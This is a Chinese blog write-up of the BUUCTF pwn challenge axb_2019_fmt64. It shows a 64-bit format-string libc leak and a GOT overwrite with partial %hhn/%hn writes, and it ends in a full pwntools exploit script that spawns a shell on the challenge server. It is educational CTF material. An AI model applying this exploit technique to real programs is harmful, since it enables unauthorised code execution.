[BUUCTF]PWN——axb_2019_fmt64(64位格式化字符串改got表)

最新推荐文章于 2024-08-04 22:46:45 发布
最新推荐文章于 2024-08-04 22:46:45 发布
阅读量2.6k 收藏 13
点赞数 2
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/113242453
版权

axb_2019_fmt64

附件

步骤:

  1. 例行检查,64位程序,只开启了nx保护
    在这里插入图片描述
  2. 本地运行看一下,可以一直输入
    在这里插入图片描述
  3. 64位ida打开
    在这里插入图片描述
    axb_2019_fmt32差不多,所以还是再次利用格式化字符串漏洞通过%n来写入数据

利用过程

  1. 首先找一下偏移,偏移为8
    在这里插入图片描述
  2. 找到偏移后我们就可以泄露libc,计算system和bin/sh了
    一开始打算跟fmt32一样来泄露libcpayload = p64(puts_got)+"%08$s",失败了,动调发现被/x00截断了,64位都有这个情况,关于64位格式化字符串利用,可以看这篇文章,建议先看一下这篇文章,64位跟32位的关于格式化字符串漏洞的利用有点不一样。
    在这里插入图片描述
    所以这边要稍微变化一下payload = "%9$sAAAA" + p64(puts_got)
    在这里插入图片描述
payload1 = "%9$s" + "AAAA" + p64(puts_got)
p.sendafter("Please tell me:",payload1)
p.recvuntil("Repeater:"))
puts_addr = u64(p.recvuntil("\x7f").ljust(8,"\x00"))

libc = LibcSearcher("puts",puts_addr)
libcbase = puts_addr - libc.dump("puts")
system_addr = libcbase + libc.dump("system")
bin_sh = libcbase + libc.dump("str_bin_sh")
  1. 接下来就是要将printf@got给替换成sys_addr的值,就是将got表中printf的函数地址给修改成system的函数地址,这样再次传入参数 ‘/bin/sh’ 在执行printf时,由于将got表给修改了,就相当于执行了system 函数 即:执行system(‘/bin/sh’)
    由于64位程序,不能直接修改,一次只能修改几个字节,具体的看上面我给的那篇文章的链接
    在这里插入图片描述
    看图可知,puts和system函数的地址只有最后一点不一样,我们只用修改不同的那个地方即可,由于一次只能修改一个字节,就将要修改的地方分成了高低字节做两次修改,
    首先修改高字节,将d1改成cf,相对偏移是12,用"%" + str(high_sys - 9) + "c%12$hhn",-9是因为一开始会输出Repeater:,长度为9,然后将c690改成2390,用"%" + str(low_sys - high_sys) + "c%13$hn"
high_sys = (system_addr >> 16) & 0xff
low_sys = system_addr & 0xffff

print('sys'+hex(system_addr))
print('low'+hex(low_sys))
print('high'+hex(high_sys))

payload2 = "%" + str(high_sys - 9) + "c%12$hhn" + "%" + str(low_sys - high_sys) + "c%13$hn"
print(len(payload2))
print(payload2)
payload2 = payload2.ljust(32,"A") + p64(sprint_got + 2) + p64(sprint_got)

将sprintf@got修改成system后传入参数bin/sh即可获得shell
好奇怪,为什么我修改sprintf没成功,修改strlen@got就成功了,懵
完整exp

# coding=utf-8
from pwn import * 
from LibcSearcher import LibcSearcher

context.log_level='debug'

#io = process('./axb_2019_fmt64')
io = remote("node3.buuoj.cn",25577)
elf = ELF("./axb_2019_fmt64")
puts_got = elf.got["puts"]
sprintf_got = elf.got["sprintf"]
strlen_got = elf.got["strlen"]
print hex(puts_got)

#payload1 = p64(puts_got)+"%08$s" 
payload1 = "%9$s" + "AAAA" + p64(puts_got)
io.sendafter("Please tell me:",payload1)
print(io.recvuntil("Repeater:"))
puts_addr = u64(io.recvuntil("\x7f").ljust(8,"\x00"))
print("puts_addr ---> ",hex(puts_addr))

libc = LibcSearcher("puts",puts_addr)
libcbase = puts_addr - libc.dump("puts")
system_addr = libcbase + libc.dump("system")
bin_sh = libcbase + libc.dump("str_bin_sh")
print("system_addr ---> ", hex(system_addr))
print("bin_sh ---> ", hex(bin_sh))

high_sys = (system_addr >> 16) & 0xff
low_sys = system_addr & 0xffff

print('sys'+hex(system_addr))
print('low'+hex(low_sys))
print('high'+hex(high_sys))

payload2 = "%" + str(high_sys - 9) + "c%12$hhn" + "%" + str(low_sys - high_sys) + "c%13$hn"
print(len(payload2))
print(payload2)
payload2 = payload2.ljust(32,"A") + p64(strlen_got + 2) + p64(strlen_got)

io.sendafter("Please tell me:",payload2) 

payload3 = ';/bin/sh\x00'

io.sendafter("Please tell me:",payload3)

io.interactive()
io.close()

在这里插入图片描述

参考链接:https://www.anquanke.com/post/id/194458?display=mobile
https://www.yuque.com/chenguangzhongdeyimoxiao/xx6p74/zg7u7w

Angel~Yan
关注
专栏目录
BUUCTF axb_2019_fmt32
BengDouLove的博客
04-16 1558
主程序就是这样的,能看到有一个printf的格式化字符串漏洞 sprintf 相当于把参数替换了之后的格式化字符串送入了第一个参数,也就是format 首先,没有后门也没有系统函数,要用格式化字符串泄露出牟哥libc函数,来获得libc基址 然后,仔细算一下 s 和 format 两个参数,都没有溢出,,也没有函数能写进got,,所以还是再次利用格式化字符串漏洞通过%n来写入数据 先看...
Pwn2019安洵杯线上赛 fmt32 && fmt64
Nothing
12-01 1058
出题人好像比较喜欢blind pwn,5道pwn题里有3个,由于时间关系来不及看rop64了(我太菜)。 1.fmt32 只给了ip&port,没有附件猜测是blind pwn,根据题目名字,猜想有格式化字符串漏洞,试了一下发现是一个循环(毕竟是复读机),每次都可以利用格式化字符串漏洞,于是首先想法是先将内存dump下来再分析,如果32位程序没开pie保护,程序首地址为0x8048000。...
[CTF]-PWN格式化字符串漏洞题综合解析
最新发布
2301_79326813的博客
08-04 1123
格式化字符串漏洞,可以修printf的got内地址为system,传参getshell解法一:在32位中可以使用fmtstr_payload直接修,免去很多麻烦这个没啥好讲的,只是这个函数64位几乎用不了。解法二:在这个方法中没有使用fmtstr_payload函数,虽然麻烦一点,但必须掌握。先回顾一下知识点在32位中,libc函数的真实地址共有32位(8位一个字节),其中前8位对于所有libc函数来说都是相同的,后24位不同。
BUUCTF之“axb_2019_fmt64
Probeginner的博客
12-15 3261
64位格式化字符串漏洞,内存地址任意写
axb-2019-fmt64
Stella_Leo的博客
08-24 707
格式化字符串,讲点不一样的 64位格式化字符串学习 题目来自2019安洵杯。 这个漏洞原理很简单,就是简单的格式化字符串漏洞,泄露和劫持got。但是64位呢,和32位有一点点不一样的地方,在这里强调和学习记录一下 直接把我坑傻了顺便学习一下libcsearcher的用法 [*] '/home/l/Desktop/AD/axb_2019_fmt64' Arch: amd64-64-little RELRO: Partial RELRO Stack: No cana
axb_2019_fmt64
z1r0的博客
01-11 1689
axb_2019_fmt64 查看保护
[BUUCTF-pwn]——axb_2019_fmt64
Y_peak的博客
03-09 413
[BUUCTF-pwn]——axb_2019_fmt64 题目地址:(https://buuoj.cn/challenges#axb_2019_fmt64)[https://buuoj.cn/challenges#axb_2019_fmt64] 这是一道格式化字符串漏洞利用的题目 checksec 一看,竟然连canary都没开,不过开不开好像都木有什么用。 在IDA中看看,可以看出明显的字符串漏洞 首先当然是计算偏移了,发送aaaa%4$x, 比较习惯发送这个hhhh。发现距离栈顶是3,还有五个寄
64位格式化字符串漏洞利用——axb_2019_fmt64
weixin_46521144的博客
03-23 2707
题目可在buuoj上找到,不知道为啥现在github怎么也上不去了,传不了题目 学了好多遍fmtstr了,感觉ctf这种学习就是。。。不学就会忘,不能停止做题目。。。 64位fmtstr和32位不同之处在于 1.传入地址可能存在0字符截断(32位由于字符数量少,可能没有这个问题) 2.修地址可能产生%xc中x过大导致网络异常 就本题而言,会出现这两种情况 首先使用IDA容易看出,这里有格式化字符串漏洞,64位 使用一般方法确定偏移量 容易看出这是第八个参数 之后采用一般的got-hijack方法,泄露pu
BUUCTF axb_2019_fmt32(格式化字符串漏洞)
weixin_45441024的博客
01-07 1253
BUUCTF axb_2019_fmt32(格式化字符串漏洞) 我们还是先check一下,发现RELRO是关闭的,那么好,可以修GOT了 显而易见这是一个格式化字符串漏洞 ,接下来我们来测试一下偏移量 这里可以看到我们输入了5个a它的ASCII码是61,但是往后进行查看只有四个61,所以我们在之后的构造中就再补上一个字符就对齐了,我们算一下它的偏移量是8,所以只要输入%7$p就可以了。我们就可以利用这个和格式化字符串来泄露出一个函数的地址,来获取libc版本,就能获得system函数的地址了。
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 239
BUUCTF 做题练习
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 568
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4085
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF(pwn)inndy_echo(32位格式化字符串got
半岛铁盒的博客
04-05 438
这道题为我们提供了 system, 和 循环 过程, 为我们简化了很多步骤 from pwn import* p=remote('node3.buuoj.cn',25331) elf=ELF('./echo') printf_got=elf.got['printf'] sys=0x8048400 payload=fmtstr_payload(7,{printf_got:sys}) p.sendline(payload) p.sendline('bin/sh') p.interactive() 对...
buu_64位fmPWN——axb_2019_fmt6464位格式化字符串got)不使用fmstr工具包
ngztx的博客
03-22 335
如果这样写,前面的地址数据经p64()打包后占的是8个字节,我们send 的地址和我们构造的格式化字符串中间还有好多个 ‘00’ ,而在字符串中 ‘00’ 就代了结束,所以在printf到‘00’时,就被认为字符串已经结束了,自然不会继续往后面printf了,也即是说我们的字符串都被’00’给截断了。到这里为止,应该对%k$n有一定的了解了,还是那个原则,%k$n前面有多少个字节,那么就会向第k个参数地址中写多少。只有后面3字节不同,截取倒数第三字节和后两字节进行修。难点3:分别计算高地址和低地址。
字符串格式化漏洞修GOT一例
Carrot_kexin的博客
10-17 930
代码如下: from pwn import * context(arch='amd64', os='linux') elf = ELF("./pwn") io = remote("111.200.241.244", 56315) catflag_addr = 0x4008DA puts_got = elf.got['puts'] payload = fmtstr_payload(6, {puts_got: catflag_addr}) io.recvuntil("3. Exit the battle") i
Pwn·fmt学习笔记
qq_22607673的博客
05-26 895
pwn的blind fmt
Pwn 学习 fmt_str_level_1_x86 格式化字符串
MrTreebook的博客
09-07 1165
【代码】Pwn 学习 fmt_str_level_1_x86 格式化字符串
Pwn 学习 fmt_str_level_1_x64 格式化字符串
MrTreebook的博客
09-10 367
第四个参数示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hn写。fmtstr payload函数返回的就是payload。pwntools工具: fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’)第二个参数示需要利用&n写入的数据, 采用字典形式,格式目标地址:准备修的值}第三个参数示已经输出的字符个数, 这里没有, 为0, 采用默认值即可;
[BUUCTF]REVERSE——wdb_2018_2nd_easyfmt(32位格式化字符串got
mcmuyanga的博客
03-08 904
wdb_2018_2nd_easyfmt 附件 步骤 例行检查,32位程序,开启了nx 本地试运行一下,看看大概的情况,看交互式的情况,知道存在格式化字符串漏洞 32位ida载入 利用思路: 找到格式化字符的偏移量 打印print@got的地址,泄露libc,计算system的地址 将print@got成system,传入参数‘/bin/bash\x00’ 利用过程: 找到偏移为6 打印print@got的地址 printf_got=elf.got["printf"] payloa
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值